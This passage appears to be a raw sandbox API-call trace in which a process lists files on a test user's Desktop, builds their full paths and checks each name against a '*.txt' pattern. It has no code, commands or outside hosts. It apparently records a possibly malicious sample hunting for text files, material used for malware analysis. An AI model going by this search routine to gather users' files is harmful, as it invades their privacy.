lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.651] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28a0 [0110.651] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.651] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.651] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0110.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.651] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.651] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*.txt") returned 0 [0110.651] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.651] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.651] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.651] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.651] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.651] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.651] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.651] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="ws8IgIZUQH.mkv" | out: lpString1="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv") returned="\\p B1LdDcHaeS\\ws8IgIZUQH.mkv" [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2ed0 [0110.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a2ed0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0110.652] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.652] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.652] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.652] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*.txt") returned 0 [0110.652] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0110.652] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.652] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.652] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.652] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.652] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.652] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.652] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2a08 [0110.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2a08, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.652] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.652] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.653] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaac8 [0110.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaac8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0110.653] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*.txt") returned 0 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0110.653] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.653] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.653] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.653] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x29a0550 [0110.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x29a0550, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.653] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.653] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabe8 [0110.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabe8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0110.653] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*.txt") returned 0 [0110.653] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.653] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.653] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.653] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.654] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif" [0110.654] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.654] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.654] lstrcatW (in: lpString1="\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="\\PKW-syaNOG91rV.gif") returned="\\PKW-syaNOG91rV.gif" [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a0560 [0110.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x29a0560, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.654] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.654] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab58 [0110.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.654] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.654] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*.txt") returned 0 [0110.654] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.654] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.654] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.654] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.654] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv" [0110.654] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.654] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.654] lstrcatW (in: lpString1="\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="\\QjzdslaoFnrvJ.flv") returned="\\QjzdslaoFnrvJ.flv" [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.654] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x29a0560 [0110.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x29a0560, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab40 [0110.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab40, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0110.655] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*.txt") returned 0 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.655] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.655] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.655] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.655] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4" [0110.655] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.655] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.655] lstrcatW (in: lpString1="\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="\\QqfcEGsF2dGoVC.mp4") returned="\\QqfcEGsF2dGoVC.mp4" [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a0560 [0110.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x29a0560, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.655] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac48 [0110.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac48, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.655] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*.txt") returned 0 [0110.655] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a98 | out: hHeap=0x29a0000) returned 1 [0110.656] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.656] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.657] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.657] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a" [0110.657] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.657] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.657] lstrcatW (in: lpString1="\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="\\SSkrbDuTIF.m4a") returned="\\SSkrbDuTIF.m4a" [0110.657] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.657] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x29a0550 [0110.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 